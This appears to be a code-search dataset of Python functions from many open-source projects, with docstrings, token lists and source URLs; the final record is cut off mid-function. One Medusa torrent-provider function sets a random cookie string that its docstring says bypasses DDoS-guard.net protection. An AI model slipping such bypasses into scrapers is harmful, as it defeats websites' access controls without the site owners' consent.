"# Determine whether simple (LG=1) or complex (LG=2) transitions",
"lg",
"=",
"items",
"[",
"3",
"]",
"# Get transition data",
"items",
",",
"values",
"=",
"get_list_record",
"(",
"file_obj",
")",
"transition",
"[",
"'energy_start'",
"]",
"=",
"items",
"[",
"0",
"]",
"transition",
"[",
"'energies'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
":",
":",
"lg",
"+",
"1",
"]",
")",
"transition",
"[",
"'direct_probability'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
"1",
":",
":",
"lg",
"+",
"1",
"]",
")",
"if",
"lg",
"==",
"2",
":",
"# Complex case",
"transition",
"[",
"'conditional_probability'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
"2",
":",
":",
"lg",
"+",
"1",
"]",
")",
"elif",
"(",
"13",
",",
"rx",
".",
"mt",
")",
"in",
"ev",
".",
"section",
":",
"file_obj",
"=",
"StringIO",
"(",
"ev",
".",
"section",
"[",
"13",
",",
"rx",
".",
"mt",
"]",
")",
"# Determine option",
"items",
"=",
"get_head_record",
"(",
"file_obj",
")",
"n_discrete_photon",
"=",
"items",
"[",
"4",
"]",
"if",
"n_discrete_photon",
">",
"1",
":",
"items",
",",
"total_xs",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"for",
"k",
"in",
"range",
"(",
"n_discrete_photon",
")",
":",
"photon",
"=",
"Product",
"(",
"'photon'",
")",
"items",
",",
"xs",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"# Re-interpolate photon production cross section and neutron cross",
"# section to union energy grid",
"energy",
"=",
"np",
".",
"union1d",
"(",
"xs",
".",
"x",
",",
"rx",
".",
"xs",
"[",
"'0K'",
"]",
".",
"x",
")",
"photon_prod_xs",
"=",
"xs",
"(",
"energy",
")",
"neutron_xs",
"=",
"rx",
".",
"xs",
"[",
"'0K'",
"]",
"(",
"energy",
")",
"idx",
"=",
"np",
".",
"where",
"(",
"neutron_xs",
">",
"0",
")",
"# Calculate yield as ratio",
"yield_",
"=",
"np",
".",
"zeros_like",
"(",
"energy",
")",
"yield_",
"[",
"idx",
"]",
"=",
"photon_prod_xs",
"[",
"idx",
"]",
"/",
"neutron_xs",
"[",
"idx",
"]",
"photon",
".",
"yield_",
"=",
"Tabulated1D",
"(",
"energy",
",",
"yield_",
")",
"# Get photon energy distribution",
"law",
"=",
"items",
"[",
"3",
"]",
"dist",
"=",
"UncorrelatedAngleEnergy",
"(",
")",
"if",
"law",
"==",
"1",
":",
"# TODO: Get file 15 distribution",
"pass",
"elif",
"law",
"==",
"2",
":",
"energy",
"=",
"items",
"[",
"1",
"]",
"primary_flag",
"=",
"items",
"[",
"2",
"]",
"dist",
".",
"energy",
"=",
"DiscretePhoton",
"(",
"primary_flag",
",",
"energy",
",",
"ev",
".",
"target",
"[",
"'mass'",
"]",
")",
"photon",
".",
"distribution",
".",
"append",
"(",
"dist",
")",
"products",
".",
"append",
"(",
"photon",
")",
"return",
"products"
] |
https://github.com/openmc-dev/openmc/blob/0cf7d9283786677e324bfbdd0984a54d1c86dacc/openmc/data/reaction.py#L664-L772
|
|
google/grr
|
8ad8a4d2c5a93c92729206b7771af19d92d4f915
|
api_client/python/grr_api_client/hunt.py
|
python
|
HuntBase.GetClientCompletionStats
|
(
self)
|
return response
|
[] |
def GetClientCompletionStats(
self) -> hunt_pb2.ApiGetHuntClientCompletionStatsResult:
args = hunt_pb2.ApiGetHuntClientCompletionStatsArgs(hunt_id=self.hunt_id)
response = self._context.SendRequest("GetHuntClientCompletionStats", args)
if not isinstance(response, hunt_pb2.ApiGetHuntClientCompletionStatsResult):
raise TypeError(f"Unexpected response type: '{type(response)}'")
return response
|
[
"def",
"GetClientCompletionStats",
"(",
"self",
")",
"->",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsResult",
":",
"args",
"=",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsArgs",
"(",
"hunt_id",
"=",
"self",
".",
"hunt_id",
")",
"response",
"=",
"self",
".",
"_context",
".",
"SendRequest",
"(",
"\"GetHuntClientCompletionStats\"",
",",
"args",
")",
"if",
"not",
"isinstance",
"(",
"response",
",",
"hunt_pb2",
".",
"ApiGetHuntClientCompletionStatsResult",
")",
":",
"raise",
"TypeError",
"(",
"f\"Unexpected response type: '{type(response)}'\"",
")",
"return",
"response"
] |
https://github.com/google/grr/blob/8ad8a4d2c5a93c92729206b7771af19d92d4f915/api_client/python/grr_api_client/hunt.py#L334-L342
|
|||
jbjorne/TEES
|
caf19a4a1352ac59f5dc13a8684cc42ce4342d9d
|
ExampleBuilders/FeatureBuilders/DrugFeatureBuilder.py
|
python
|
DrugFeatureBuilder.buildMTMXFeatures
|
(self, e1, e2)
|
[] |
def buildMTMXFeatures(self, e1, e2):
names = self.getMTMXAttrs(e1, e2, "mtmxName")
self.setFeature("mtmxNames-" + "-".join(names))
if names[0] == names[1]:
if names[0] in ["", "none"]:
self.setFeature("mtmxNames-both_unknown")
else:
self.setFeature("mtmxNames-both_identical")
self.setFeature("mtmxShortNames-" + "-".join(self.getMTMXAttrs(e1, e2, "mtmxNameShort")))
mtmxCuis = self.getMTMXAttrs(e1, e2, "mtmxCui")
for mtmxCui in mtmxCuis:
self.setFeature("mtmxCui_" + mtmxCui)
self.setFeature("mtmxCuis-" + "-".join(mtmxCuis))
# Probabilities
rv = self.getMTMXAttrs(e1, e2, "mtmxProb")
if rv[0] in ["", "none"]: rv[0] = "0"
if rv[1] in ["", "none"]: rv[1] = "0"
rv[0] = int(rv[0])
rv[1] = int(rv[1])
assert rv[0] <= 1000 and rv[1] <= 1000, (rv[0], rv[1])
rv.sort()
self.setFeature("mtmxProbMin", float(rv[0]) / 1000.0)
self.setFeature("mtmxProbMax", float(rv[1]) / 1000.0)
# Semtypes
sem = self.getMTMXAttrs(e1, e2, "mtmxSemTypes")
#print sem
for i in sem[0].split(","):
for j in sem[1].split(","):
semPair = [i, j]
semPair.sort()
#print "semPair", semPair
self.setFeature("semPair-" + "-".join(semPair))
self.setFeature("semType-" + i)
self.setFeature("semType-" + j)
|
[
"def",
"buildMTMXFeatures",
"(",
"self",
",",
"e1",
",",
"e2",
")",
":",
"names",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxName\"",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-\"",
"+",
"\"-\"",
".",
"join",
"(",
"names",
")",
")",
"if",
"names",
"[",
"0",
"]",
"==",
"names",
"[",
"1",
"]",
":",
"if",
"names",
"[",
"0",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-both_unknown\"",
")",
"else",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxNames-both_identical\"",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxShortNames-\"",
"+",
"\"-\"",
".",
"join",
"(",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxNameShort\"",
")",
")",
")",
"mtmxCuis",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxCui\"",
")",
"for",
"mtmxCui",
"in",
"mtmxCuis",
":",
"self",
".",
"setFeature",
"(",
"\"mtmxCui_\"",
"+",
"mtmxCui",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxCuis-\"",
"+",
"\"-\"",
".",
"join",
"(",
"mtmxCuis",
")",
")",
"# Probabilities",
"rv",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxProb\"",
")",
"if",
"rv",
"[",
"0",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"rv",
"[",
"0",
"]",
"=",
"\"0\"",
"if",
"rv",
"[",
"1",
"]",
"in",
"[",
"\"\"",
",",
"\"none\"",
"]",
":",
"rv",
"[",
"1",
"]",
"=",
"\"0\"",
"rv",
"[",
"0",
"]",
"=",
"int",
"(",
"rv",
"[",
"0",
"]",
")",
"rv",
"[",
"1",
"]",
"=",
"int",
"(",
"rv",
"[",
"1",
"]",
")",
"assert",
"rv",
"[",
"0",
"]",
"<=",
"1000",
"and",
"rv",
"[",
"1",
"]",
"<=",
"1000",
",",
"(",
"rv",
"[",
"0",
"]",
",",
"rv",
"[",
"1",
"]",
")",
"rv",
".",
"sort",
"(",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxProbMin\"",
",",
"float",
"(",
"rv",
"[",
"0",
"]",
")",
"/",
"1000.0",
")",
"self",
".",
"setFeature",
"(",
"\"mtmxProbMax\"",
",",
"float",
"(",
"rv",
"[",
"1",
"]",
")",
"/",
"1000.0",
")",
"# Semtypes",
"sem",
"=",
"self",
".",
"getMTMXAttrs",
"(",
"e1",
",",
"e2",
",",
"\"mtmxSemTypes\"",
")",
"#print sem",
"for",
"i",
"in",
"sem",
"[",
"0",
"]",
".",
"split",
"(",
"\",\"",
")",
":",
"for",
"j",
"in",
"sem",
"[",
"1",
"]",
".",
"split",
"(",
"\",\"",
")",
":",
"semPair",
"=",
"[",
"i",
",",
"j",
"]",
"semPair",
".",
"sort",
"(",
")",
"#print \"semPair\", semPair",
"self",
".",
"setFeature",
"(",
"\"semPair-\"",
"+",
"\"-\"",
".",
"join",
"(",
"semPair",
")",
")",
"self",
".",
"setFeature",
"(",
"\"semType-\"",
"+",
"i",
")",
"self",
".",
"setFeature",
"(",
"\"semType-\"",
"+",
"j",
")"
] |
https://github.com/jbjorne/TEES/blob/caf19a4a1352ac59f5dc13a8684cc42ce4342d9d/ExampleBuilders/FeatureBuilders/DrugFeatureBuilder.py#L96-L129
|
||||
twilio/twilio-python
|
6e1e811ea57a1edfadd5161ace87397c563f6915
|
twilio/rest/voice/v1/byoc_trunk.py
|
python
|
ByocTrunkInstance.voice_method
|
(self)
|
return self._properties['voice_method']
|
:returns: The HTTP method to use with voice_url
:rtype: unicode
|
:returns: The HTTP method to use with voice_url
:rtype: unicode
|
[
":",
"returns",
":",
"The",
"HTTP",
"method",
"to",
"use",
"with",
"voice_url",
":",
"rtype",
":",
"unicode"
] |
def voice_method(self):
"""
:returns: The HTTP method to use with voice_url
:rtype: unicode
"""
return self._properties['voice_method']
|
[
"def",
"voice_method",
"(",
"self",
")",
":",
"return",
"self",
".",
"_properties",
"[",
"'voice_method'",
"]"
] |
https://github.com/twilio/twilio-python/blob/6e1e811ea57a1edfadd5161ace87397c563f6915/twilio/rest/voice/v1/byoc_trunk.py#L390-L395
|
|
saimadhu-polamuri/DataAspirant_codes
|
4adfdad255a90ef39fca1bf83a927ffb129dda78
|
text_preprocessing_techniques/scripts/preprocessing.py
|
python
|
Preprocess.emoticons_words
|
(self, text)
|
return text
|
Return :- string after converting emoticons to words
Input :- String
Output :- String
|
Return :- string after converting emoticons to words
Input :- String
Output :- String
|
[
"Return",
":",
"-",
"string",
"after",
"converting",
"emoticons",
"to",
"words",
"Input",
":",
"-",
"String",
"Output",
":",
"-",
"String"
] |
def emoticons_words(self, text):
"""
Return :- string after converting emoticons to words
Input :- String
Output :- String
"""
for emot in EMOTICONS:
emoticon_pattern = r'('+emot+')'
# replace
emoticon_words = EMOTICONS[emot]
replace_text = emoticon_words.replace(",","")
replace_text = replace_text.replace(":","")
replace_text_list = replace_text.split()
emoticon_name = '_'.join(replace_text_list)
text = re.sub(emoticon_pattern, emoticon_name, text)
return text
|
[
"def",
"emoticons_words",
"(",
"self",
",",
"text",
")",
":",
"for",
"emot",
"in",
"EMOTICONS",
":",
"emoticon_pattern",
"=",
"r'('",
"+",
"emot",
"+",
"')'",
"# replace ",
"emoticon_words",
"=",
"EMOTICONS",
"[",
"emot",
"]",
"replace_text",
"=",
"emoticon_words",
".",
"replace",
"(",
"\",\"",
",",
"\"\"",
")",
"replace_text",
"=",
"replace_text",
".",
"replace",
"(",
"\":\"",
",",
"\"\"",
")",
"replace_text_list",
"=",
"replace_text",
".",
"split",
"(",
")",
"emoticon_name",
"=",
"'_'",
".",
"join",
"(",
"replace_text_list",
")",
"text",
"=",
"re",
".",
"sub",
"(",
"emoticon_pattern",
",",
"emoticon_name",
",",
"text",
")",
"return",
"text"
] |
https://github.com/saimadhu-polamuri/DataAspirant_codes/blob/4adfdad255a90ef39fca1bf83a927ffb129dda78/text_preprocessing_techniques/scripts/preprocessing.py#L265-L280
|
|
pymedusa/Medusa
|
1405fbb6eb8ef4d20fcca24c32ddca52b11f0f38
|
medusa/providers/torrent/html/anidex.py
|
python
|
AniDexProvider.random_sixteen
|
()
|
return ''.join(random.choice(
string.ascii_uppercase + string.ascii_lowercase + string.digits
) for _ in range(16))
|
Create 16 character string, for cookies.
This will bypass DDos-guard.net protection
|
Create 16 character string, for cookies.
|
[
"Create",
"16",
"character",
"string",
"for",
"cookies",
"."
] |
def random_sixteen():
"""
Create 16 character string, for cookies.
This will bypass DDos-guard.net protection
"""
return ''.join(random.choice(
string.ascii_uppercase + string.ascii_lowercase + string.digits
) for _ in range(16))
|
[
"def",
"random_sixteen",
"(",
")",
":",
"return",
"''",
".",
"join",
"(",
"random",
".",
"choice",
"(",
"string",
".",
"ascii_uppercase",
"+",
"string",
".",
"ascii_lowercase",
"+",
"string",
".",
"digits",
")",
"for",
"_",
"in",
"range",
"(",
"16",
")",
")"
] |
https://github.com/pymedusa/Medusa/blob/1405fbb6eb8ef4d20fcca24c32ddca52b11f0f38/medusa/providers/torrent/html/anidex.py#L53-L61
|
|
albertz/music-player
|
d23586f5bf657cbaea8147223be7814d117ae73d
|
mac/pyobjc-framework-Quartz/Examples/Programming with Quartz/BasicDrawing/AppDrawing.py
|
python
|
doJPEGDocumentWithMultipleProfiles
|
(context)
|
[] |
def doJPEGDocumentWithMultipleProfiles(context):
url = GetURL(kOurSubstituteJPG)
if url is not None:
Images.drawJPEGDocumentWithMultipleProfiles(context, url)
|
[
"def",
"doJPEGDocumentWithMultipleProfiles",
"(",
"context",
")",
":",
"url",
"=",
"GetURL",
"(",
"kOurSubstituteJPG",
")",
"if",
"url",
"is",
"not",
"None",
":",
"Images",
".",
"drawJPEGDocumentWithMultipleProfiles",
"(",
"context",
",",
"url",
")"
] |
https://github.com/albertz/music-player/blob/d23586f5bf657cbaea8147223be7814d117ae73d/mac/pyobjc-framework-Quartz/Examples/Programming with Quartz/BasicDrawing/AppDrawing.py#L123-L127
|
||||
eirannejad/pyRevit
|
49c0b7eb54eb343458ce1365425e6552d0c47d44
|
site-packages/sqlalchemy/orm/events.py
|
python
|
InstanceEvents.init
|
(self, target, args, kwargs)
|
Receive an instance when its constructor is called.
This method is only called during a userland construction of
an object, in conjunction with the object's constructor, e.g.
its ``__init__`` method. It is not called when an object is
loaded from the database; see the :meth:`.InstanceEvents.load`
event in order to intercept a database load.
The event is called before the actual ``__init__`` constructor
of the object is called. The ``kwargs`` dictionary may be
modified in-place in order to affect what is passed to
``__init__``.
:param target: the mapped instance. If
the event is configured with ``raw=True``, this will
instead be the :class:`.InstanceState` state-management
object associated with the instance.
:param args: positional arguments passed to the ``__init__`` method.
This is passed as a tuple and is currently immutable.
:param kwargs: keyword arguments passed to the ``__init__`` method.
This structure *can* be altered in place.
.. seealso::
:meth:`.InstanceEvents.init_failure`
:meth:`.InstanceEvents.load`
|
Receive an instance when its constructor is called.
|
[
"Receive",
"an",
"instance",
"when",
"its",
"constructor",
"is",
"called",
"."
] |
def init(self, target, args, kwargs):
"""Receive an instance when its constructor is called.
This method is only called during a userland construction of
an object, in conjunction with the object's constructor, e.g.
its ``__init__`` method. It is not called when an object is
loaded from the database; see the :meth:`.InstanceEvents.load`
event in order to intercept a database load.
The event is called before the actual ``__init__`` constructor
of the object is called. The ``kwargs`` dictionary may be
modified in-place in order to affect what is passed to
``__init__``.
:param target: the mapped instance. If
the event is configured with ``raw=True``, this will
instead be the :class:`.InstanceState` state-management
object associated with the instance.
:param args: positional arguments passed to the ``__init__`` method.
This is passed as a tuple and is currently immutable.
:param kwargs: keyword arguments passed to the ``__init__`` method.
This structure *can* be altered in place.
.. seealso::
:meth:`.InstanceEvents.init_failure`
:meth:`.InstanceEvents.load`
"""
|
[
"def",
"init",
"(",
"self",
",",
"target",
",",
"args",
",",
"kwargs",
")",
":"
] |
https://github.com/eirannejad/pyRevit/blob/49c0b7eb54eb343458ce1365425e6552d0c47d44/site-packages/sqlalchemy/orm/events.py#L227-L256
|
||
twisted/twisted
|
dee676b040dd38b847ea6fb112a712cb5e119490
|
src/twisted/trial/runner.py
|
python
|
isPackageDirectory
|
(dirname)
|
return False
|
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
|
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
|
[
"Is",
"the",
"directory",
"at",
"path",
"dirname",
"a",
"Python",
"package",
"directory?",
"Returns",
"the",
"name",
"of",
"the",
"__init__",
"file",
"(",
"it",
"may",
"have",
"a",
"weird",
"extension",
")",
"if",
"dirname",
"is",
"a",
"package",
"directory",
".",
"Otherwise",
"returns",
"False"
] |
def isPackageDirectory(dirname):
"""
Is the directory at path 'dirname' a Python package directory?
Returns the name of the __init__ file (it may have a weird extension)
if dirname is a package directory. Otherwise, returns False
"""
def _getSuffixes():
return importlib.machinery.all_suffixes()
for ext in _getSuffixes():
initFile = "__init__" + ext
if os.path.exists(os.path.join(dirname, initFile)):
return initFile
return False
|
[
"def",
"isPackageDirectory",
"(",
"dirname",
")",
":",
"def",
"_getSuffixes",
"(",
")",
":",
"return",
"importlib",
".",
"machinery",
".",
"all_suffixes",
"(",
")",
"for",
"ext",
"in",
"_getSuffixes",
"(",
")",
":",
"initFile",
"=",
"\"__init__\"",
"+",
"ext",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"os",
".",
"path",
".",
"join",
"(",
"dirname",
",",
"initFile",
")",
")",
":",
"return",
"initFile",
"return",
"False"
] |
https://github.com/twisted/twisted/blob/dee676b040dd38b847ea6fb112a712cb5e119490/src/twisted/trial/runner.py#L64-L78
|
|
TheSouthFrog/stylealign
|
910632d2fccc9db61b00c265ae18a88913113c1d
|
util/buffer.py
|
python
|
BufferedWrapper.__next__
|
(self)
|
return result
|
[] |
def __next__(self):
result = self.buffer_.get()
self._async_next()
return result
|
[
"def",
"__next__",
"(",
"self",
")",
":",
"result",
"=",
"self",
".",
"buffer_",
".",
"get",
"(",
")",
"self",
".",
"_async_next",
"(",
")",
"return",
"result"
] |
https://github.com/TheSouthFrog/stylealign/blob/910632d2fccc9db61b00c265ae18a88913113c1d/util/buffer.py#L17-L20
|
|||
ESCOMP/CESM
|
4e21488773baa1bd9fb06fb8750db9f9bd12b705
|
manage_externals/manic/repository_svn.py
|
python
|
SvnRepository.__init__
|
(self, component_name, repo, ignore_ancestry=False)
|
Parse repo (a <repo> XML element).
|
Parse repo (a <repo> XML element).
|
[
"Parse",
"repo",
"(",
"a",
"<repo",
">",
"XML",
"element",
")",
"."
] |
def __init__(self, component_name, repo, ignore_ancestry=False):
"""
Parse repo (a <repo> XML element).
"""
Repository.__init__(self, component_name, repo)
self._ignore_ancestry = ignore_ancestry
if self._branch:
self._url = os.path.join(self._url, self._branch)
elif self._tag:
self._url = os.path.join(self._url, self._tag)
else:
msg = "DEV_ERROR in svn repository. Shouldn't be here!"
fatal_error(msg)
|
[
"def",
"__init__",
"(",
"self",
",",
"component_name",
",",
"repo",
",",
"ignore_ancestry",
"=",
"False",
")",
":",
"Repository",
".",
"__init__",
"(",
"self",
",",
"component_name",
",",
"repo",
")",
"self",
".",
"_ignore_ancestry",
"=",
"ignore_ancestry",
"if",
"self",
".",
"_branch",
":",
"self",
".",
"_url",
"=",
"os",
".",
"path",
".",
"join",
"(",
"self",
".",
"_url",
",",
"self",
".",
"_branch",
")",
"elif",
"self",
".",
"_tag",
":",
"self",
".",
"_url",
"=",
"os",
".",
"path",
".",
"join",
"(",
"self",
".",
"_url",
",",
"self",
".",
"_tag",
")",
"else",
":",
"msg",
"=",
"\"DEV_ERROR in svn repository. Shouldn't be here!\"",
"fatal_error",
"(",
"msg",
")"
] |
https://github.com/ESCOMP/CESM/blob/4e21488773baa1bd9fb06fb8750db9f9bd12b705/manage_externals/manic/repository_svn.py#L40-L52
|
||
jython/jython3
|
def4f8ec47cb7a9c799ea4c745f12badf92c5769
|
lib-python/3.5.1/idlelib/SearchDialogBase.py
|
python
|
SearchDialogBase.create_command_buttons
|
(self)
|
Place buttons in vertical command frame gridded on right.
|
Place buttons in vertical command frame gridded on right.
|
[
"Place",
"buttons",
"in",
"vertical",
"command",
"frame",
"gridded",
"on",
"right",
"."
] |
def create_command_buttons(self):
"Place buttons in vertical command frame gridded on right."
f = self.buttonframe = Frame(self.top)
f.grid(row=0,column=2,padx=2,pady=2,ipadx=2,ipady=2)
b = self.make_button("close", self.close)
b.lower()
|
[
"def",
"create_command_buttons",
"(",
"self",
")",
":",
"f",
"=",
"self",
".",
"buttonframe",
"=",
"Frame",
"(",
"self",
".",
"top",
")",
"f",
".",
"grid",
"(",
"row",
"=",
"0",
",",
"column",
"=",
"2",
",",
"padx",
"=",
"2",
",",
"pady",
"=",
"2",
",",
"ipadx",
"=",
"2",
",",
"ipady",
"=",
"2",
")",
"b",
"=",
"self",
".",
"make_button",
"(",
"\"close\"",
",",
"self",
".",
"close",
")",
"b",
".",
"lower",
"(",
")"
] |
https://github.com/jython/jython3/blob/def4f8ec47cb7a9c799ea4c745f12badf92c5769/lib-python/3.5.1/idlelib/SearchDialogBase.py#L173-L179
|
||
cloudera/hue
|
23f02102d4547c17c32bd5ea0eb24e9eadd657a4
|
desktop/core/ext-py/boto-2.46.1/boto/cloudsearch/domain.py
|
python
|
Domain.index_documents
|
(self)
|
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
|
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
|
[
"Tells",
"the",
"search",
"domain",
"to",
"start",
"indexing",
"its",
"documents",
"using",
"the",
"latest",
"text",
"processing",
"options",
"and",
"IndexFields",
".",
"This",
"operation",
"must",
"be",
"invoked",
"to",
"make",
"options",
"whose",
"OptionStatus",
"has",
"OptioState",
"of",
"RequiresIndexDocuments",
"visible",
"in",
"search",
"results",
"."
] |
def index_documents(self):
"""
Tells the search domain to start indexing its documents using
the latest text processing options and IndexFields. This
operation must be invoked to make options whose OptionStatus
has OptioState of RequiresIndexDocuments visible in search
results.
"""
self.layer1.index_documents(self.name)
|
[
"def",
"index_documents",
"(",
"self",
")",
":",
"self",
".",
"layer1",
".",
"index_documents",
"(",
"self",
".",
"name",
")"
] |
https://github.com/cloudera/hue/blob/23f02102d4547c17c32bd5ea0eb24e9eadd657a4/desktop/core/ext-py/boto-2.46.1/boto/cloudsearch/domain.py#L224-L232
|
||
PaddlePaddle/Research
|
2da0bd6c72d60e9df403aff23a7802779561c4a1
|
NLP/EMNLP2019-MAL/src/beam_search.py
|
python
|
BeamSearch.grow_finished
|
(self, i, finished_seq, finished_scores, finished_flags, curr_seq,
curr_scores, curr_finished)
|
return self.compute_topk_scores_and_seq(curr_finished_seq, curr_finished_scores,
curr_finished_scores, curr_finished_flags,
pick_finish=True)
|
grow_finished
|
grow_finished
|
[
"grow_finished"
] |
def grow_finished(self, i, finished_seq, finished_scores, finished_flags, curr_seq,
curr_scores, curr_finished):
"""
grow_finished
"""
finished_seq = layers.concat([finished_seq,
layers.fill_constant([self.batch_size, self.beam_size, 1], dtype='int64', value=0)],
axis=2)
curr_scores = curr_scores + (1.0 - layers.cast(curr_finished, 'int64')) * -INF
curr_finished_seq = layers.concat([finished_seq, curr_seq], axis=1)
curr_finished_scores = layers.concat([finished_scores, curr_scores], axis=1)
curr_finished_flags = layers.concat([finished_flags, curr_finished], axis=1)
return self.compute_topk_scores_and_seq(curr_finished_seq, curr_finished_scores,
curr_finished_scores, curr_finished_flags,
pick_finish=True)
|
[
"def",
"grow_finished",
"(",
"self",
",",
"i",
",",
"finished_seq",
",",
"finished_scores",
",",
"finished_flags",
",",
"curr_seq",
",",
"curr_scores",
",",
"curr_finished",
")",
":",
"finished_seq",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_seq",
",",
"layers",
".",
"fill_constant",
"(",
"[",
"self",
".",
"batch_size",
",",
"self",
".",
"beam_size",
",",
"1",
"]",
",",
"dtype",
"=",
"'int64'",
",",
"value",
"=",
"0",
")",
"]",
",",
"axis",
"=",
"2",
")",
"curr_scores",
"=",
"curr_scores",
"+",
"(",
"1.0",
"-",
"layers",
".",
"cast",
"(",
"curr_finished",
",",
"'int64'",
")",
")",
"*",
"-",
"INF",
"curr_finished_seq",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_seq",
",",
"curr_seq",
"]",
",",
"axis",
"=",
"1",
")",
"curr_finished_scores",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_scores",
",",
"curr_scores",
"]",
",",
"axis",
"=",
"1",
")",
"curr_finished_flags",
"=",
"layers",
".",
"concat",
"(",
"[",
"finished_flags",
",",
"curr_finished",
"]",
",",
"axis",
"=",
"1",
")",
"return",
"self",
".",
"compute_topk_scores_and_seq",
"(",
"curr_finished_seq",
",",
"curr_finished_scores",
",",
"curr_finished_scores",
",",
"curr_finished_flags",
",",
"pick_finish",
"=",
"True",
")"
] |
https://github.com/PaddlePaddle/Research/blob/2da0bd6c72d60e9df403aff23a7802779561c4a1/NLP/EMNLP2019-MAL/src/beam_search.py#L142-L159
|
|
python/cpython
|
e13cdca0f5224ec4e23bdd04bb3120506964bc8b
|
Lib/pdb.py
|
python
|
Pdb.lookupmodule
|
(self, filename)
|
return None
|
Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
|
Helper function for break/clear parsing -- may be overridden.
|
[
"Helper",
"function",
"for",
"break",
"/",
"clear",
"parsing",
"--",
"may",
"be",
"overridden",
"."
] |
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
|
[
"def",
"lookupmodule",
"(",
"self",
",",
"filename",
")",
":",
"if",
"os",
".",
"path",
".",
"isabs",
"(",
"filename",
")",
"and",
"os",
".",
"path",
".",
"exists",
"(",
"filename",
")",
":",
"return",
"filename",
"f",
"=",
"os",
".",
"path",
".",
"join",
"(",
"sys",
".",
"path",
"[",
"0",
"]",
",",
"filename",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"f",
")",
"and",
"self",
".",
"canonic",
"(",
"f",
")",
"==",
"self",
".",
"mainpyfile",
":",
"return",
"f",
"root",
",",
"ext",
"=",
"os",
".",
"path",
".",
"splitext",
"(",
"filename",
")",
"if",
"ext",
"==",
"''",
":",
"filename",
"=",
"filename",
"+",
"'.py'",
"if",
"os",
".",
"path",
".",
"isabs",
"(",
"filename",
")",
":",
"return",
"filename",
"for",
"dirname",
"in",
"sys",
".",
"path",
":",
"while",
"os",
".",
"path",
".",
"islink",
"(",
"dirname",
")",
":",
"dirname",
"=",
"os",
".",
"readlink",
"(",
"dirname",
")",
"fullname",
"=",
"os",
".",
"path",
".",
"join",
"(",
"dirname",
",",
"filename",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"fullname",
")",
":",
"return",
"fullname",
"return",
"None"
] |
https://github.com/python/cpython/blob/e13cdca0f5224ec4e23bdd04bb3120506964bc8b/Lib/pdb.py#L1601-L1623
|
|
baidu/knowledge-driven-dialogue
|
ba85518a1ac2a57988188fc5f2b8fe42e1facf64
|
generative_pt/network.py
|
python
|
main
|
()
|
main
|
main
|
[
"main"
] |
def main():
"""
main
"""
config = model_config()
if config.check:
config.save_dir = "./tmp/"
config.use_gpu = torch.cuda.is_available() and config.gpu >= 0
device = config.gpu
torch.cuda.set_device(device)
# Data definition
corpus = KnowledgeCorpus(data_dir=config.data_dir, data_prefix=config.data_prefix,
min_freq=0, max_vocab_size=config.max_vocab_size,
min_len=config.min_len, max_len=config.max_len,
embed_file=config.embed_file, with_label=config.with_label,
share_vocab=config.share_vocab)
corpus.load()
if config.test and config.ckpt:
corpus.reload(data_type='test')
train_iter = corpus.create_batches(
config.batch_size, "train", shuffle=True, device=device)
valid_iter = corpus.create_batches(
config.batch_size, "valid", shuffle=False, device=device)
test_iter = corpus.create_batches(
config.batch_size, "test", shuffle=False, device=device)
# Model definition
model = KnowledgeSeq2Seq(src_vocab_size=corpus.SRC.vocab_size,
tgt_vocab_size=corpus.TGT.vocab_size,
embed_size=config.embed_size, hidden_size=config.hidden_size,
padding_idx=corpus.padding_idx,
num_layers=config.num_layers, bidirectional=config.bidirectional,
attn_mode=config.attn, with_bridge=config.with_bridge,
tie_embedding=config.tie_embedding, dropout=config.dropout,
use_gpu=config.use_gpu,
use_bow=config.use_bow, use_dssm=config.use_dssm,
use_pg=config.use_pg, use_gs=config.use_gs,
pretrain_epoch=config.pretrain_epoch,
use_posterior=config.use_posterior,
weight_control=config.weight_control,
concat=config.decode_concat)
model_name = model.__class__.__name__
# Generator definition
generator = TopKGenerator(model=model,
